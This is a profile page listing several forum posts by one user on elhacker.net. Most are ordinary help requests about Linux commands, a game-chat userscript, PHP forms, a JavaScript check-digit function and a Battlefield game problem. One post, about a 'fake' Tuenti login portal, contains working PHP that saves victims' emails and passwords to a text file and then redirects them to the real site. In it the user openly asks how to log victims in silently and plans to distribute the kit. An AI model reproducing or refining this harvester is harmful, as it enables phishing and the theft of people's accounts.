elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: [1]
1  Sistemas Operativos / GNU/Linux / Renombrar carpetas a minusculas en: 6 Octubre 2013, 20:55 pm
hola, sabriais ayudarme con poner un comando que renombre unicamente las carpetas de todo un arbol de directorios a minusculas?
he encontrado esto
find ./ -depth -exec rename -n 'y/[A-Z]/[a-z]/' {} ";"
pero al ejecutarlo aparentemente solo lo hace con los archivos, no quiero que toque los archivos, solo las carpetas, y que entre en todos los subdirectorios pero creo que ya lo hace con -depth
2  Sistemas Operativos / GNU/Linux / Duda terminal en: 6 Octubre 2013, 18:18 pm
Buenas, mi duda es sencilla: tengo una carpeta que dentro tiene muchas carpetas y subcarpetas y archivos (vamos, es la instalacion de un juego, carpetas y archivos por todos lados)
pues lo que quiero es un comando que me liste todas las carpetas (solo carpetas, no archivos, y por supuesto carpetas que se hallen en cualquier sitio de esa carpeta, ya sea en la raiz o en subdirectorios) que contenga mayusculas en el nombre

lo unico que he podido hacer es esto: ls -lR | grep '^d' | grep -o '[^ ]*[A-Z][^ ]*'
pero eso no me muestra las rutas de cada carpeta, que tambien me hace falta, solo me muestra el nombre de las carpetas encontradas
gracias!
3  Programación / Desarrollo Web / Script para insertar chat IRC en una web cualquiera (javascript) en: 21 Junio 2013, 13:39 pm
Buenas! A ver, no se javascript y por eso acudo aqui a ver si algun santo se ofrece
Resumiendo lo que quiero es un chat para hablar los de la alianza en la pagina ogame (seguro que la conoceis, pero si no es un juego de navegador online). He usado varios "shoutbox", que son chats basicamente, pero unos estan bugs, otros a menos que seas premium no va como quisieras, y otros no encuentro script en userscript.org para insertarlo en ogame
Entonces, como lo que buscamos es algo muy sencillo, solo un chat normal, he pensado en probar un IRC pero insertarlo en la pagina para no tener dos paginas abiertas

He encontrado esto: http://puu.sh/156KD pero el codigo http://userscripts.org/scripts/review/145822 como se puede ver en el parrafo siguiente al tocho rojo, pide un .js que no esta ya online porque ese servidor esta caido aparentemente


Entonces, como no tengo mucha idea del formato de los IRC, la cosa es, se podria aprovechar ese script para adaptarlo a un IRC?

Saludos y gracias!
4  Programación / Desarrollo Web / Ayuda con javascript chrome (facil) en: 15 Junio 2013, 21:43 pm
Necesito a alguien que sepa javascript
estoy intentando hacer que funcione un shoutbox (como un irc) en el juego ogame
el script es este:
https://userscripts.org/scripts/review/101068
(hay que quitar las XXX del include por el numero del universo de tu cuenta ogame, por ejemplo Taurus es 120, eso se puede ver al loguearte que en la barra de direcciones pone uni120.ogame.com.es, tambien dodne pone CODIGO hay que poner la id del shoutbox pero se puede usar el codigo "example" sin comillas)

pues la cosa es que en firefox sale asi:





y en chrome asi:




y aunque hagas zoom out sigue apareciendo solamente esa parte de lo que deberia aparecer
ayudas?
5  Programación / PHP / Doble accion de formulario Php en: 4 Octubre 2010, 19:27 pm
Hola. Mi problema es sencillo. Hay un formulario en html, vale? pues quiero que ese formulario se envie a un archivo php y despues o a la vez se envie a otra pagina, todo directo sin intervenciones aparte del usuario. Como lo hago?
6  Programación / PHP / Reenviar datos de formulario php en: 30 Septiembre 2010, 22:04 pm
Hola!
Para que entendais mejor mi situación, lo dire sin rodeos ni verguenza xD
Simplemente estoy haciendo un fake del portal de Tuenti para que guarde las cuentas en un .txt
Bueno, pues el caso es que lo estoy haciendo medio copiar medio creacion propia/adaptacion al nuevo portal porque el fake que encontre era antiguo/perfeccionamiento total de modo que no pida 2 veces la cuenta  >: D  (siii, cuando lo tenga perfecto, version beta, lo publico y lo vendo... bueno, vale, gratis xDD)
El caso es que ya tengo el portal (solo he guardado la pagina xD y modificado el destino del form)
y despues el php es el siguiente:


Código:
<?php
$id=$_POST['login'];
$pass=$_POST['passwd'];
$fecha=date("H:i:s - d D, m Y");
$FOOL=fopen('registro.txt',a);
fwrite($FOOL,"
Email: ".$id."
Pass: " .$pass."
".$fecha."
_________________ ");
fclose($FOOL);
echo "<script>alert(\"Tu usuario y/o contraseña son incorrectos. Por favor, vuelve a intentarlo\");</script>";
echo "<meta http-equiv='refresh' content='l;url=https://www.tuenti.com/?m=Login&amp;func=do_login'>";
?>

Bien, pues ahi veo que en el txt escribe la cuenta, la pass y la fecha, y una linea divisoria.
Ok, todo va como la seda. Ahora, el problema a vista de mi dichoso perfeccionismo esta despues de imprimir los datos, cuando toca redirigir.
Segun eso, el php te saca un mensaje de error (o de aviso, o un simple mensaje) diciendo que no es correcto, y a continuacion te redirije a la oficial de tuenti.
Bueno, empezando con que NO te redirije, sino que solo saca el mensaje, mi objetivo es que no saque ningun mensaje, sino que con los valores de $id y $pass, o los valores de login y passwd, los mande al oficial sin rechistar, y directamente loguearte alli, o sea, que enviase los datos.
Quizas sea bastante complejo que envie los datos al oficial, porque haya codigo raro de por medio que impide que se metan datos de paginas externas, o algo... No sé.
Alguna sugerencia?
Ah, por cierto, el php se llama google.php, y subo ambos archivos para que los descargueis y lo tortureis:
http://www.multiupload.com/18A108MZRQ

Saludos! Todo sea por el bien de la comunidad!
7  Seguridad Informática / WarZone / Ayudita en javascript?^^ en: 17 Diciembre 2009, 23:38 pm
Hello! :D
pues necesito vuestra sabia ayuda para resolver mis insignificantes, a vuestros ojos, problemas.
Bien, se trata simplemente de una ligera explicación sobre javascript en este código:

Código:


function ver (cod) {

if (cod.length != 16){
alert("Codigo No Valido");
return false;
}

var codx =new Array(cod);
var chk = '';
var tmp;
var cvs;
var cvd;

cvd = cod.substr(15,1);
cod = cod.substr(0,15);

 if (cod.length != 15 || IsNumeric(cod) == false){
 alert("Codigo No Valido");
 return false;
 }

 for (i=0;i<cod.length;i++){
   if (i%2 == 0){
   tmp = cod.substring(i,i+1) * 1;
   
   }
   else{
   tmp = cod.substring(i,i+1) * 2;
   }
   
  if (tmp >= 10){
  tmp = tmp.toString();
  tmp = tmp.substr(0,1) + tmp.substr(1,1);
  }
 
 chk = chk.concat(tmp);
 }

tmp = '';


for (i=0;i<chk.length;i++){
tmp = (tmp*1) + (chk.charAt(i)*1);
}


tmp = tmp.toString();
chk = (tmp.substr(0,1)*1) + (tmp.substr(1,1)*1);
chk = chk * 10;
chk = (chk*1) - (tmp*1);
cvs = chk % 10;

  if (cvs == cvd){
 
  return true;
  }
  else{
  alert("Codigo No Valido");
  return false;
  }
}


function IsNumeric(sText)

{
   var ValidChars = "0123456789.";
   var IsNumber=true;
   var Char;

 
   for (i = 0; i < sText.length && IsNumber == true; i++)
      {
      Char = sText.charAt(i);
      if (ValidChars.indexOf(Char) == -1)
         {
         IsNumber = false;
         }
      }
   return IsNumber;
   
   }




Sólo lo más importante para comprenderlo, ya que con mi suficiente nivel de inglés creo que lo comprenderé (como hago siempre en todos los lenguajes: muy pocas veces he leido tutoriales, excepto para casos como este)

Bueno, espero que vuestras perfectas mentes, al menos a mis ojos, sean capaces de resolver mi problemilla.
Gracias!! (ojalá existiese un método de meterme todos los lenguajes de programación en la cabeza de golpe xDD esq en la ESO no tengo apenas tiempo de na... T.T)
8  Media / Juegos y Consolas / PROBLEMAZO BF 1942 Y MODS.... en: 5 Octubre 2007, 21:11 pm
Hola!!
tengo 1 problemilla con el battlefield
tengo instalado el bf gold soldiers, que es un pack k viene el desert combat, secret weapon, road to rome....
y llevo jugando con el en internet, con mi padre en lan....
pro aora resulta que pongo en el mio el desert combat, creo una partida y todo bien, aora pongo el desert combat en el de mi padre y ESTA EN INGLES, no le di importancia y le doy a multiplayer, lan, update y no me sale la partida, lo hacemos al reves y tampoco, todos los juegos lo mismo!!!  >:(
no se k acer!
ayudadme

SALUDOS: DROKER
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines